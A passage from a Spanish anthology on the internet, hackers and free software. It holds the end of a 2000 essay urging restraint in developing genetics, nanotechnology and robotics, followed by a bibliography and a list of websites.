En Engines of Creation, Eric Drexlerproponía que construyéramos un escudonanotecnológico activo una suerte desistema inmunológico para la biosferapara defendernos de cualquierreplicador peligroso, que pudieraescaparse de laboratorios o fuera creadomaliciosamente. Pero el escudo queproponía sería enormemente peligroso

Page 705: Internet, hackers y software li   varios

en sí mismo nada evitaría quedesarrollara problemas deautoinmunidad y atacara él mismo labiosfera.[123]

Dificultades similares se aplican ala construcción de «escudos» contra laingeniería genética y de robots. Estastecnologías son demasiado poderosaspara crear escudos contra ellas en loslapsos de tiempo en cuestión; incluso sifuera posible implementar escudosdefensivos, los efectos colaterales de sudesarrollo serían al menos tanpeligrosos como las tecnologías de lasque estamos tratando de protegernos.

Estas posibilidades son todas no

Page 706: Internet, hackers y software li   varios

deseables, impracticables o ambascosas. La única alternativa realista queveo es la abstención: limitar eldesarrollo de las tecnologías que sondemasiado peligrosas, limitando nuestrabúsqueda de ciertos tipos deconocimiento.

Sí, ya sé, el conocimiento es bueno,ya que es la búsqueda de nuevasverdades. Hemos estado en busca delconocimiento desde los tiemposantiguos. Aristóteles empezó suMetafísica con el sencillo enunciado:«Todos los hombres por naturalezadesean conocer.» Desde hace tiempo,como base de consenso en nuestra

Page 707: Internet, hackers y software li   varios

sociedad, hemos acordado respecto delvalor del acceso abierto a lainformación, y reconocemos losproblemas que conllevan los intentos derestringir su desarrollo y acceso. Entiempos recientes, hemos llegado areverenciar el conocimiento científico.

Pero más allá de los sólidosantecedentes históricos, si el accesoabierto y el desarrollo ilimitado de losconocimientos nos colocan, de ahora enmás, en claro peligro de extinción,entonces el sentido común demanda quereexaminemos incluso estas creenciasbásicas, sostenidas durante largotiempo.

Page 708: Internet, hackers y software li   varios

Fue Nietzsche quien nos advirtió, enel final del siglo XIX, que no sólo Diosha muerto sino que «la fe en laciencia, que pese a todo existeindudablemente, no puede deber suorigen a un cálculo de utilidad; tieneque haber surgido a expensas delhecho de que la no-utilidad ypeligrosidad de la ‘voluntad de saber’,de ‘saber a cualquier precio’ seapuesta a prueba constantemente». Eseste peligro que ahora enfrentamos lasconsecuencias de nuestra búsqueda deverdad. La verdad que busca la cienciaciertamente puede considerarse unsustituto peligroso de Dios si implicara

Page 709: Internet, hackers y software li   varios

ciertas posibilidades de llevarnos a laextinción.

Si pudiéramos ponernos de acuerdo,como especie, sobre lo que queremos,adónde fuimos encaminados, y por qué,entonces podríamos hacer mucho menospeligroso nuestro futuro entoncespodríamos entender a qué podemos ydeberíamos abstenernos. De otramanera, podemos con facilidad imaginaruna carrera armamentística lanzándoseen torno a las tecnologías GNR, comosucedió con las tecnologías NBQ en elsiglo XX. Este es quizás el riesgo másimportante, ya que una vez iniciada unacarrera como esa, es muy difícil

Page 710: Internet, hackers y software li   varios

detenerla. Esta vez a diferencia de loque pasaba durante el ProyectoManhattan no estamos en guerra,enfrentando un enemigo implacable queamenaza nuestra civilización; estamosimpulsados, en cambio, por nuestroshábitos, nuestros deseos, nuestro sistemaeconómico y nuestra necesidadcompetitiva de saber.

Creo que todos deseamos quenuestro rumbo esté definido por nuestrosvalores colectivos, éticos y morales. Sihubiéramos logrado más sabiduríacolectiva en los pasados miles de años,entonces un diálogo en este sentidoresultaría más práctico, y los increíbles

Page 711: Internet, hackers y software li   varios

poderes que estamos por liberar noserían tan problemáticos.

Uno pensaría que seríamos llevadosa ese diálogo movidos por nuestroinstinto de preservación. Los individuostienen claramente este deseo, sinembargo como especie, nuestrocomportamiento parece no jugarnos afavor. Al resolver las amenazasnucleares, muchas veces nos hablamosde manera mentirosa a nosotros mismos,y a los demás, incrementando en granmedida los riesgos. Sea que estoestuviera motivado políticamente, oporque elegimos no pensar lasproyecciones, o porque al enfrentarnos

Page 712: Internet, hackers y software li   varios

con amenazas tan graves actuamos conuna falta de temor irracional, no lo sé,pero no nos llevó a un buen desenlace.

Las nuevas cajas de Pandora de lagenética, la nanotecnología y la robóticaestán casi abiertas, pero pareciera quenosotros apenas nos damos cuenta. Lasideas no pueden ser vueltas a poner enuna caja; a diferencia del uranio o elplutonio, no necesitan ser enterradas otratadas químicamente, y puedencopiarse libremente. Una vez quesalieron, salieron. Churchill destacó unavez, en una famosa frase, que losnorteamericanos y sus líderes

«invariablemente hacen lo correcto,

Page 713: Internet, hackers y software li   varios

una vez que examinaron todas lasdemás alternativas». En este caso,sin embargo, debemos actuar con mayorprevisión, pues hacer lo correcto reciénal final puede significar perderdefinitivamente la oportunidad dehacerlo.

Como dijo Thoreau, Nosotros novamos montados en los rieles, son losrieles los que van montados ennosotros; y ésto es lo que debemoscombatir en nuestros tiempos. Lapregunta es, de hecho, ¿quién va a ser elque ponga el rumbo? ¿Sobreviviremos anuestras tecnologías?

Estamos siendo arrojados a este

Page 714: Internet, hackers y software li   varios

nuevo siglo sin ningún plan, control ofreno. ¿Hemos ido ya demasiado lejosen el camino como para cambiar elrumbo? Yo no lo creo, pero aún noestamos intentándolo, y la últimaoportunidad de retomar el control elpunto de no retorno se acercarápidamente. Tenemos nuestrosprimeros robots mascotas, así comotécnicas de ingeniería genéticadisponibles en el mercado, y nuestratécnica a nanoescala mejorarápidamente. Mientras que el desarrollode esas tecnologías procede a través deuna serie de pasos, no es necesariamenteel caso como sucedió en el Proyecto

Page 715: Internet, hackers y software li   varios

Manhattan y la prueba de Trinity de queel último paso en una tecnología deprueba sea largo y arduo. El salto queposibilite la auto-replicación salvaje enrobótica, ingeniería genética onanotecnología podría darserepentinamente, reviviendo la sorpresaque sentimos cuando supimos de laclonación de un mamífero.

Y sin embargo yo creo que tenemosuna firme y sólida base para laesperanza. Nuestros intentos de lidiarcon armas de destrucción masiva en elúltimo siglo nos proveen un relucienteejemplo de abstención para considerar:el abandono unilateral de EE.UU, sin

Page 716: Internet, hackers y software li   varios

prerrequisitos, del desarrollo de armasbiológicas. Este abandono se basó en latoma de conciencia del hecho de quemientras que significaría un enormeesfuerzo crear estas terribles armas,podrían, a partir de entonces, serfácilmente reproducidas y caer en manosde naciones hostiles o de gruposterroristas. La clara conclusión fue quedesarrollar estas armas crearía peligrosadicionales para nosotros, y queestaríamos más seguros si no lasdesarrollábamos. Hemos reafirmadonuestra abstención de las armasbiológicas y químicas en la Convenciónsobre Armas Biológicas de 1972

Page 717: Internet, hackers y software li   varios

(Biological Weapons Convention,BWC) y en la Convención sobre ArmasQuímicas de 1993 (Chemical WeaponsConvention, CWC).[124]

En cuanto al aún considerable riesgode amenaza por armas nucleares, con elque hemos vivido por más de 50 años,el reciente rechazo del Senado alTratado Extenso de Prohibición dePruebas deja en claro que la abstenciónal uso de armas nucleares no serápolíticamente fácil. Pero tenemos unaoportunidad única, con el fin de laGuerra Fría, de prevenir una carreraarmamentística multipolar. Construir, apartir de la abstención de la BWC y la

Page 718: Internet, hackers y software li   varios

CWC, una abolición exitosa de lasarmas nucleares, podría ayudarnos acrear un hábito de abstención a lastecnologías peligrosas (de hecho, sireducimos a 100 el número de todas lasarmas nucleares en el mundo lo quesería equivalente al poder destructivototal de la Segunda Guerra Mundial, unameta considerablemente más sencillapodríamos eliminar este riesgo deextinción).[125]

Supervisar la abstención será unproblema difícil, pero no insuperable.Tenemos suerte de haber hecho yamucho trabajo relevante en el marco dela BWC y otros tratados. Nuestra tarea

Page 719: Internet, hackers y software li   varios

más importante será aplicar esto atecnologías que son naturalmente muchomás comerciales que militares. Lanecesidad fundamental aquí es detransparencia, pues la dificultad desupervisión es directamenteproporcional a la dificultad de distinguirentre actividades para la abstención yactividades legítimas.

Francamente creo que la situación en1945 era más simple que la queenfrentamos ahora: las tecnologíasnucleares eran pasibles de serrazonablemente separadas entre sus usoscomerciales y sus usos militares, y elmonitoreo era ayudado por la naturaleza

Page 720: Internet, hackers y software li   varios

de las pruebas atómicas y la facilidadcon que la radioactividad podíamedirse. La investigación deaplicaciones militares podía realizarseen laboratorios nacionales como LosÁlamos, con los resultados mantenidosbajo secreto tanto tiempo como fueraposible.

Las tecnologías GNR no se dividenabiertamente entre usos comerciales ymilitares; dado su potencial en elmercado, es difícil imaginar sudesarrollo sólo en laboratoriosnacionales. Con sus dilatados márgenespara el uso comercial, supervisar laabstención requerirá un régimen de

Page 721: Internet, hackers y software li   varios

supervisión similar al de las armasbiológicas, pero en una escala sinprecedentes. Ésto, inevitablemente,producirá tensiones entre nuestraprivacidad individual, nuestro deseo deinformación registrada por copyright, yla necesidad de supervisión paraprotegernos a todos. Sin dudaencontraremos grandes resistencias aesta pérdida de privacidad y de libertadde acción.

La supervisión de la abstención aciertas tecnologías GNR deberá tenerlugar en el ciberespacio tanto como enlugares físicos. El tema crítico seráhacer aceptable la necesaria

Page 722: Internet, hackers y software li   varios

transparencia en un mundo deinformación basada en el derecho depropiedad, presumiblemente creandonuevas formas de protección de lapropiedad intelectual.

Supervisar la aplicación tambiénrequerirá que científicos e ingenierosadopten un rígido código ético deconducta, similar al juramentohipocrático, y tengan el coraje personalde avisar cuando sea necesario, inclusoen situaciones de alto costo para símismos. Ésto respondería al llamadoque hizo 50 años después de Hiroshimael premio Nobel Hans Bethe, uno de losmás destacados de los miembros

Page 723: Internet, hackers y software li   varios

sobrevivientes del Proyecto Manhattan,a que todos los científicos «cesen ydesistan de trabajar en la creación,desarrollo, mejora y mantenimiento dearmas nucleares y otras armaspotenciales de destrucción masiva»[126] En el siglo XXI, esto requiere devigilancia y responsabilidad personal departe de aquellos que trabajen entecnologías NBQ y GNR para evitar laimplementación de armas de destrucciónmasiva y la destrucción masivahabilitada por el conocimiento.

Thoreau también dijo que «seremosricos en proporción al número de cosasque nos podamos permitir dejar

Page 724: Internet, hackers y software li   varios

tranquilas». Todos queremos serfelices, pero pareciera importantepreguntarnos si necesitamos asumirsemejantes riesgos de destrucción totalpara conseguir todavía másconocimiento y más cosas; el sentidocomún nos dice que hay un límite paranuestras necesidades materiales y quecierto conocimiento es demasiadopeligroso y es mejor dejarlo pasar.

Tampoco deberíamos perseguir unasemi-inmortalidad sin considerar loscostos, sin considerar los sensiblesincrementos del riesgo de extinción. Lainmortalidad, siendo quizás el original,ciertamente no es el único sueño utópico

Page 725: Internet, hackers y software li   varios

posible.Hace poco tuve la suerte de conocer

al distinguido escritor y catedráticoJacques Attali, cuyo libro Lignes d´horizons (Millenium, en la traducción alinglés) ayudó a inspirar el acercamientode Java y Jini a la siguiente era de lacomputación ubicua.[127] En su nuevolibro Fraternités, Attali describe lamanera en que nuestros sueños de utopíahan cambiado con el tiempo:

En el despertar de nuestrassociedades, los hombres veían supaso por la Tierra sólo como unlaberinto de dolor, al final del cual

Page 726: Internet, hackers y software li   varios

se erguía una puerta que conducía,a través de la muerte, a lacompañía de dioses y a laEternidad. Con los hebreos ydespués los griegos, algunoshombres se animaron a liberarse delas demandas teológicas y soñaruna Ciudad ideal donde la Libertadflorecería. Otros, percibiendo laevolución de la sociedad demercado, comprendieron que lalibertad de algunos conllevaría laalienación de otros, y persiguieronla Igualdad.

Jacques me ayudó a entender cómo

Page 727: Internet, hackers y software li   varios

estas tres diferentes metas utópicas hoycoexisten en tensión en nuestra sociedad.Sigue adelante para describir una cuartautopía, Fraternidad, cuya base es elaltruismo. La Fraternidad en sí asocia lafelicidad individual a la felicidad de losotros, haciéndose cargo de la promesade autosustentamiento.

Esto cristalizó el problema que meproducía el sueño de Kurzweil. Unacercamiento tecnológico a la Eternidadsemi-inmortalidad a través de larobótica quizás no sea la utopía másdeseable, y su búsqueda conllevagrandes peligros. Quizás debamosrepensar nuestras elecciones utópicas.

Page 728: Internet, hackers y software li   varios

¿Adónde podemos mirar para hallaruna nueva base ética con que definir elrumbo? Las ideas del libro Ética para elNuevo Milenio, del Dalai Lama, me hanparecido muy útiles. Como a lo mejor sesabe, pero se recalca poco, el DalaiLama afirma que la cosa más importantepara nosotros es llevar nuestras vidascon amor y compasión por los otros, yque nuestras sociedades necesitandesarrollar nociones más fuertes deresponsabilidad universal y acerca denuestra interdependencia; propone unstandard de conducta ética positiva paraindividuos y sociedades que parececonsonante con la utopía de Fraternidad

Page 729: Internet, hackers y software li   varios

de Attali.El Dalai Lama además afirma que

debemos comprender qué es lo que hacefeliz a la gente, y tomar conciencia delas firmes evidencias de que ni elprogreso material ni la búsqueda depoder del conocimiento son la clave quehay límites para lo que la ciencia y lainvestigación científica solas puedenhacer.

Nuestra noción occidental defelicidad parece venir de los griegos,quienes la definieron como «elejercicio de poderes vitales a lo largode líneas de excelencia, en una vidaque promueve su libertad». [128]

Page 730: Internet, hackers y software li   varios

Ciertamente, necesitamos encontrardesafíos consistentes y suficientescampos de libertad en nuestras vidas sivamos a ser felices en lo que sea quenos espera. Pero creo que debemosencontrar vías de escape alternativaspara nuestras fuerzas creativas, más alláde la cultura del crecimiento económicoperpetuo; este crecimiento ha sido unagran bendición por varios cientos deaños, pero no nos ha dado una felicidadcarente de impurezas, y ahora debemoselegir entre perseguir un crecimientoirrestricto y sin dirección a través de laciencia y la tecnología y los clarospeligros que acompañan a esto.

Page 731: Internet, hackers y software li   varios

Ha pasado más de un año desde miprimer encuentro con Ray Kurzweil yJohn Searle. Veo a mi alrededor motivosde esperanza en las voces de cautela yrenuencia y en aquellas personas que hedescubierto que están tan preocupadascomo yo acerca de nuestra predicaactual. Tengo, también, un sentimientode responsabilidad personal másprofundo no por el trabajo que ya herealizado, sino por el trabajo quetodavía podría realizar, en laconfluencia de las ciencias.

Pero muchas otras personas quesaben de los peligros todavíapermanecen extrañamente en silencio. Si

Page 732: Internet, hackers y software li   varios

se las presiona, sueltan el ya conocidoesto no es nada nuevo como si saber loque podría pasar fuera suficienteresponsabilidad. Me dicen, hayuniversidades llenas de investigadoresde bioética que estudian estos temastodo el día. Dicen todo esto ya estáescrito de antes, y por expertos. Seq u e j a n , tus preocupaciones yargumentos ya son cosa vieja.

No sé dónde esconden su temor estaspersonas. Como arquitecto de sistemascomplejos, entro a esta arena como no-profesional. ¿Pero esto deberíadesmerecer mis inquietudes? Estoy altanto de cuánto se ha escrito al respecto,

Page 733: Internet, hackers y software li   varios

hablado al respecto y conferenciado alrespecto, con tanta autoridad. ¿Pero estoquiere decir que le llegó a la gente?¿Quiere decir que podemos olvidar losriesgos que nos esperan?

Saber no es una respuesta racionalsuficiente como para no actuar.¿Podemos dudar de que el conocimientose ha vuelto un arma que manipulamoscontra nosotros mismos?

Las experiencias de los científicosatómicos muestran claramente lanecesidad de asumir responsabilidadpersonal, el peligro de que las cosasvayan demasiado rápido y la manera enque un proceso puede cobrar vida

Page 734: Internet, hackers y software li   varios

propia. Podemos, como hicieron ellos,crear problemas insuperables en lapsosde tiempo casi nulos. Debemos realizarmás trabajo de reflexión si no queremosser sorprendidos de la misma manera yshockearnos con las consecuencias denuestros inventos.

Mi trabajo personal sigue siendo elmejoramiento de la confiabilidad delsoftware. El software es unaherramienta, y como diseñador deherramientas debo luchar con los usos alos que se someten las herramientas quehago. Siempre he creído que hacer másconfiable el software, dados susmúltiples usos, hará del mundo un lugar

Page 735: Internet, hackers y software li   varios

mejor y más seguro; si llegara a pensarlo contrario, estaría moralmenteobligado a detener mi trabajo. Ahorapuedo imaginar que un día así puedallegar.

Todo esto no me enoja pero me deja,al menos, un poco melancólico. De aquíen más, el progreso, para mí, será dealgún modo agridulce.

¿Recuerdan la hermosa penúltimaescena de Manhattan donde WoodyAllen está tirado en su sillón y le habla aun grabador? Relata una historia sobrepersonas que se crean a sí mismasproblemas innecesarios, neuróticos,porque eso los mantiene alejados de

Page 736: Internet, hackers y software li   varios

afrontar otros problemas espeluznantes,sin solución, acerca del universo.

Se hace a sí mismo la pregunta,¿Qué hace que valga la pena vivir lavida? y se responde lo que es importantepara él: Groucho Marx, Willie Mays, elsegundo movimiento de la sinfoníaJúpiter, la grabación de «Potato HeadBlues» de Louis Armstrong, laspelículas suecas, La EducaciónSentimental de Flaubert, Marlon Brando,Frank Sinatra, las manzanas y peras deCézanne, los cangrejos en «Sam Wo» y,por último, el desenlace: la cara deTracy, su amor.

Cada uno de nosotros tiene sus cosas

Page 737: Internet, hackers y software li   varios

preciosas, y al cuidar de ellaslocalizamos la esencia de nuestrahumanidad. A la larga, es debido anuestra gran capacidad para cuidar yproteger que todavía soy optimista deque confrontaremos con los peligrosostemas que tenemos por delante.

Mi expectativa inmediata es la departicipar en una discusión mucho másamplia sobre los temas tratados aquí,con gente proveniente de diversasprácticas, con un programa que no sepredisponga a temer o favorecer a latecnología por su misma razón de ser.

Para empezar, he presentado dosveces estos temas en eventos

Page 738: Internet, hackers y software li   varios

organizados por el Aspen Institute yademás he propuesto que la AcademiaAmericana de Artes y Ciencias los tomecomo una extensión de su trabajo en lasConferencias Pugwash. (Éstas se hanrealizado desde 1957 para discutir elcontrol de armas, en especial de armasnucleares, y para formular políticasviables.)

Es una lástima que los encuentrosPugwash empezaran recién cuando elgenio ya hubiera salido hace bastante dela botella unos 15 años tarde. Nosotrostambién estamos teniendo una salidaretardada para confrontar con los temasde la tecnología del siglo XXI la

Page 739: Internet, hackers y software li   varios

prevención de la destrucción masivahabilitada por el conocimiento, ymayores retrasos se tornan inaceptables.

Así que todavía estoy investigando;hay muchas más cosas para aprender.Vayamos a tener éxito o a fracasar;vayamos a sobrevivir o a caer víctimasde estas tecnologías, no está decididotodavía. Me quedé despierto hasta tardeotra vez son casi las 6 AM. Estoytratando de imaginar mejores respuestas,de romper el hechizo y liberarlas de lapiedra.

Abril, 2000.

Page 740: Internet, hackers y software li   varios

Bibliografia GeneralAnderson, Ross, «'Trusted

Computing' Frequently AskedQuestions», enhttp://www.cl.cam.ac.uk/users/rja14/tcpa-

faq.html . [hay trad. cast.: «Preguntasfrecuentes sobre InformáticaFiable»,http://linuca.org/body.phtml?

nIdNoticia=207]

Asimov, Isaac [1950],Yo, robot.Buenos Aires, Sudamericana, 1977.

Bethe, Hans A., Carta al presidentede EE.UU, W. Clinton, enhttp://www.fas.org/bethecr.htm. 25 deabril de 1997.

Page 741: Internet, hackers y software li   varios

Besser, Howard, «IntellectualProperty: the Attack on Public Space inCyberspace», enhttp://www.gseis.ucla.edu/~howard/Papers/pw-

public-spaces.html/

Berardi, Franco (Bifo), «Laincesante guerra entre red yvideocracia», enPasquinelli, Matteo(comp.), Mediactivismo: Estrategias yprácticas de la comunicaciónindependiente. Roma, DerieveApprodi,2002.

Lavoro zero", en DeriveApprodi,Año II, Nº 3-4, Invierno-primavera de1994.

Carbonell, Eudald y Sala, Robert,

Page 742: Internet, hackers y software li   varios

laneta humà. Barcelona, Empúries,2000. [hay trad. cast.: Planeta humano.Barcelona, Península, 2000.]

Clarke, Arthur C., «Presidents,Experts, and Asteroids», en Science, 5de junio de 1998. Republicado como«Science and Society», en Greetings,carbon-based bipeds! Collected Essays1934-1998. New York, St. Martin'sPress, 1999.

Dawkins, Richard, The selfish gene.Oxford, Oxford University Press, 1989.[hay trad. cast.: El gen egoísta,Barcelona, Salvat, 1993.]

Deleuze, Gilles y Guattari, Félix,Mil mesetas, Valencia, Pre-Textos,

Page 743: Internet, hackers y software li   varios

1988.Doty, Paul, «The Forgotten Menace:

Nuclear Weapons Stockpiles StillRepresents the Biggest Threat toCivilization», en Nature, Nº 402, 9 dediciembre de 1999.

Drexler, K. Eric, Engines ofCreation:The coming era ofNanotechnology. New York, Doubleday,1986 (hay versión en internet:http://www.foresight.org/EOC/index.html/

). [hay trad. cast.: La nanotecnología: elsurgimiento de las máquinas decreación. Barcelona, Gedisa, 1993.]

Peterson, C. y Pergamit, G.,Unbounding the Future: The

Page 744: Internet, hackers y software li   varios

Nanotechnology Revolution. New York,William Morrow, 1991 (hay versión eninternet:http://www.foresight.org/UTF/Unbound_LBW/index.html/

).Duran Etxezarreta, Saez,

Globalización capitalista. Barcelona,Virus, 2001.

Dyson, George B, Darwing amongthe Machines. Reading, Addison-Wesley, 1997.

Easterbrook, Gregg, «Food forfuture», carta a The New York Times,19 de noviembre de 1999.

Forrest, David, «RegulatingNanotechnology Development», en

Page 745: Internet, hackers y software li   varios

http://www.foresight.org/NanoRev/Forrest1989.html/

Garrett, Laurie, The comingplague: newly emerging diseases in aworld out of balance. London, Penguin,1994.

GNU, «GNU General PublicLicense». Versión 2. Junio 1991.Versión oficial inglesa enhttp://www.gnu.org/licenses/gpl.html.[hay versión cast.:http://lucas.hispalinux.es/Otros/gples/gples.html

]Hamilton, Edith The Greek Way.

New York, Norton, 1942.Hafner, Katie y Markoff,

John,Cyberpunk: outlaws and hackers

Page 746: Internet, hackers y software li   varios

on the computer frontier. London, CorgiBooks, 1993.

Halleck, Dee Dee, «Una tormentaenvolvente: el cyber-forum abiertoIndymedia», en Pasquinelli, Matteo(comp.), Mediactivismo: Estrategias yprácticas de la comunicaciónindependiente. Roma, DerieveApprodi,2002.

Hofstadter, Douglas, Gödel,Escher, Bach: un eterno y grácil bucle.Barcelona, Tusquets, 1989.

Joy, Bill,«The future ofcomputation», ponencia en el FirstForesight Conference onNanotechnology, octubre de 1989.

Page 747: Internet, hackers y software li   varios

Publicado en Crandall, B. C. y Lewis J.(eds.), Nanotechnology: Research andPerspectives. Cambridge, MIT Press,1992.

Kauffman, Stuart, «Self-replication: Even Peptides Do It», enNature, Nº 382, 8 de agosto de 1996(hay version en internet:http://www.santafe.edu/sfi/People/kauffman/sak-

peptides.html/ ).Kelly-Bootle, Stan, The Devil´s DP

Dictionary. New York, McGraw-Hill,1981.

Kidder, Tracy, the soul of a newmachine. Boston, Little-Brown, 1981.

Kurzweil, Ray, The age of spiritual

Page 748: Internet, hackers y software li   varios

machines: When computers excedehuman intelligence. London, Penguin,1999. [hay trad. cast.: La era de lasmáquinas espirituales: Cuando lascomputadoras superen la mente humana.Barcelona, Planeta, 1999.]

Leslie, John, The End of the World:The Science and Ethics of HumanExtinction. London, Routledge, 1996.

Levy, Stephen, Hackers: Heroes ofthe Computer Revolution. New York,Bantam Books, 1984.

Lovins, Amory y Lovins, Hunter,«A Tale of Two Botanies», en Wired,Nº 8.04, año 8, abril de 2000, p. 247(hay versión en internet:

Page 749: Internet, hackers y software li   varios

http://www.wired.com/wired/archive/8.04/botanies.html/

).Lundstrom, David E., A Few Good

Men From UNIVAC. Cambridge, MITPress, 1987.

Martínez, Juan Antonio, «Softwarelibre: una aproximación desde la teoríade juegos», en Linux Actual, Nº 11.

Marx, Karl, Grundisse. Elementosfundamentales para la crítica de laeconomía política. México, Siglo XXI,1986.

Meselson, Matthew, «The Problemof Biological Weapons», presentaciónen la Reunión de la American Academyof Arts and Sciences (Academia Artes y

Page 750: Internet, hackers y software li   varios

Ciencias de EE.UU), 13 de enero de1999 (hay versión en internet:http://www.pugwash.org/reports/cbw/cbw5.htm/

).Mizrach, Steve Is there a hacker

ethic for 90s hackers?, enhttp://www.fiu.edu/~mizrachs/hackethic.html/[1997]

Moravec, Hans P., Robot:Robot:Mere Machine to Trascendental Mind.New York, Oxford University Press,1999.

Nissen, Jörgen, Pojkarna viddatorn. Symposion Graduale, 1993.

Papathéodorou, Aris y Moineau,Laurent, «Coopération et production

Page 751: Internet, hackers y software li   varios

immaterielle dans le logiciel libre», enMultitudes, Nº 1, marzo de 2000 (hayversión en internet:http://multitudes.samizdat.net/article.php3?

id_article=212&var_recherche=Papatheodorou/

). [hay trad. cast.: «Cooperación yproducción inmaterial en el softwarelibre»,http://sindominio.net/biblioweb/telematica/cooperacion.html

]Pasquinelli, M (comp.),

Mediactivismo: Estrategias y prácticasde la comunicación independiente.Roma, DerieveApprodi, 2002.

Raymond, Eric S., «Homesteadingthe noosphere»,

Page 752: Internet, hackers y software li   varios

http://www.catb.org/~esr/writings/cathedral-

bazaar/ (también en la ediciónaumentada de The Cathedral & theBazaar: Musings on Linux and OpenSourse by an Accidental Revolutionary.Sebastopol (EE.UU), O'Reilly, 2001).[hay trad. cast.: «Cultivando lanoosfera»,http://www.geocities.com/jagem/noosfera.html

]

The cathedral and the bazaar, enhttp://www.catb.org/~esr/writings/cathedral-

bazaar/ [1997] (hay versión en papel:The Cathedral & the Bazaar: Musingson Linux and Open Sourse by anAccidental Revolutionary. Sebastopol,

Page 753: Internet, hackers y software li   varios

O'Reilly, 1999). [hay trad. cast.: Lacatedral y el bazar,http://es.tldp.org/Otros/catedral-

bazar/cathedral-es-paper-

00.html#toc1/ ]«The magic cauldron» en The

Cathedral & the Bazaar,http://www.catb.org/~esr/writings/cathedral-

bazaar/ (hay versión en papel: TheCathedral & the Bazaar:Musings onLinux and Open Sourse by an AccidentalRevolutionary. Sebastopol, O'Reilly,2001 [edición aumentada]). [hay trad.cast.: «El caldero mágico»,http://www.alanta.info/MagicCauldron.html

]

Page 754: Internet, hackers y software li   varios

«The Revenge of the hackers», enAA.VV., Open Sources: Voices from theopen source revolution, Sebastopol,O'Reilly, 1999 (hay versión en internet:http://www.oreilly.com/catalog/opensources/book/raymond2.html

). También en la edición aumentada deThe Cathedral & the Bazaar: Musings onLinux and Open Sourse by an AccidentalRevolutionary. Sebastopol, O'Reilly,2001. [hay traducción castellana enelaboración de la compilación OpenSources en TLDP-ES/LuCAS(Hispalinux); verhttp://es.tldp.org/htmls/proy-

opensources.html ]Raymond, Eric S. (comp.), Jargon

Page 755: Internet, hackers y software li   varios

File, enhttp://www.catb.org/~esr/jargon/

The New Hacker's Dictionary.Cambridge, MIT Press, 1996.

Reynolds, Terry S., «MedievalRoots of the Industrial Revolution», enScientific American, julio de 1984.

Rheingold, Howard [1985], Toolsfor thought, enhttp://www.rheingold.com/texts/tft/

(hay versión en papel: Tools for thought:The History and Future of Mind-Expanding Technology. Cambridge, MITPress, 2000).

Rhodes, Richard, Visions oftechnology: a century of vital debate

Page 756: Internet, hackers y software li   varios

about machines, systems, and the humanworld. New York, Simon & Schuster,1999.

Sagan, Carl, Pale blue dot: a visionof the human future in space. New York,Random House, 1994. [hay trad. cast.:Un punto azul pálido: una visión delfuturo humano en el espacio. Barcelona,Planeta, 1995.]

Shiner, Lewis, «Confessions of anEx-Cyberpunk», nota de opinión en TheNew York Times, 7 de enero de 1991.

Stallman, Richard M., El copyrightcontra la comunidad en la era de lasredes de ordenadores, conferencia en laUniversidad de Burdeos, 7 de julio de

Page 757: Internet, hackers y software li   varios

2000, enhttp://sindominio.net/biblioweb/telematica/stallman-

copyright.html .[1996], «El derecho a leer», en

http://sindominio.net/biblioweb/telematica/derecho_leer.html

1998.[1985], «El manifiesto GNU», en

http://www.gnu.org/gnu/manifesto.es.html

«The GNU Operating System and theFree Software Movement», en AA.VV.,Open Sources: Voices from the opensource revolution, Sebastopol, O'Reilly,1999 (hay versión en internet:http://biblioweb.sindominio.net/telematica/open-

sources-html/node42.html ). [haytrad. cast. en elaboración de la

Page 758: Internet, hackers y software li   varios

compilación completa en TLDP-ES/LuCAS (Hispalinux); verhttp://es.tldp.org/htmls/proy-

opensources.html ]«We Can Put an End to Word

Attachments», enhttp://www.gnu.org/phi-

losophy/no-word-

attachments.html , 2002. [hay trad.cast.: «Podemos acabar con los archivosadjuntos en Word»,http://www.gnu.org/philosophy/no-

word-attachments.es.html ]Sterling, Bruce, The hacker

crackdown: law and disorder on theelectronic frontier. New York, Bantam

Page 759: Internet, hackers y software li   varios

Books, 1992 (hay versión en internet:http://www.eff.org/Misc/Publications/Bruce_Sterling/Hacker_Crackdown/.

[hay trad. cast.: La caza de hackers,http://banners.noticiasdot.com/termometro/boletines/docs/consultoras/hackers/75-

Lacazade272621.pdf ]Sterling, Bruce (comp.),

Mirrorshades: una antología ciberpunk.Madrid, Siruela, 1998.

Stoll, Clifford, The cuckoo´s egg:tracking a spy through the maze ofcomputer espionage. New York,Doubleday, 1989. [hay trad. cast.: Elhuevo del cuco. Barcelona, Planeta,1990.]

Stone, Irving, The Agony and theEcstasy. Garden City, Doubleday, 1961.

Page 760: Internet, hackers y software li   varios

[hay trad. cast.: La agonía y el éxtasis:vida de Miguel Ángel. Buenos Aires,Emecé, 1978.]

The Mentor,«The conscience of aHacker», en Phrack, Nº 7, 1986 (http://www.phrack.org/phrack/7/P07-

03 ).Turkle, Sherry, Turkle, Sherry, The

second self: computers and the humanspirit. New York, Simon and Schuster,1984. [hay trad. cast.: El segundo yo: lascomputadoras y el espíritu humano.Buenos Aires, Galápago, 1984.]

Vinelli, Natalia y RodríguezEsperón, Carlos, Contrainformación:medios alternativos para la acción

Page 761: Internet, hackers y software li   varios

política. Buenos Aires, Continente,2004.

Vonnegut, Kurt, Cat's cradle. NewYork, Holt, Rinehart and Winston, 1963.[hay trad. cast.: Cuna de gato.Barcelona, Anagrama, 1988.]

Walleij, Linus [1998], Copyrightfinns inte, version 3.0, enhttp://www.df.lth.se/~triad/book/

[hay trad. inglesa: Copyright does notexist,http://svenskefaen.no/cdne/ ]

Weizenbaum, Joseph, Computerpower and human reason: from judgmentto calculation. San Francisco, W.H.Freeman, 1976. [hay trad. cast.: La

Page 762: Internet, hackers y software li   varios

frontera entre el ordenador y la mente.Madrid, Pirámide, 1978.]

Sitios y paginas

Attririon,http://www.attrition.org/

Digital Speech Project (ProyectoExpresión Digital),http://www.digitalspeech.org/

Electronic Frontier Foundation(Fundación Frontera Electrónica),http://www.eff.org/

Free Software Foundation(Fundación Software Libre),

Page 763: Internet, hackers y software li   varios

http://www.fsf.org

Indymedia Argentina,http://argentina.indymedia.org/

Netcraft,http://www.netcraft.com/survey/

Operación Clambake,http://www.xenu.com/

Phrack,http://www.phrack.org/

Public Knowledge (ConocimientoPúblico),http://www.publicknowledge.org/

TLDP-ES/LuCAS (Hispalinux),http://es.tldp.org/

http://www.freebsd.org/copyright/

Page 764: Internet, hackers y software li   varios

Bibliografia complementaria

Babini, Nicolás, La informática enArgentina 1956-1966. Buenos Aires,Letra Buena, 1991.

Bonsembiante, Fernando, LlanerosSolitarios: hackers, la guerrillainformática. Buenos Aires, EspasaCalpe, 1995.

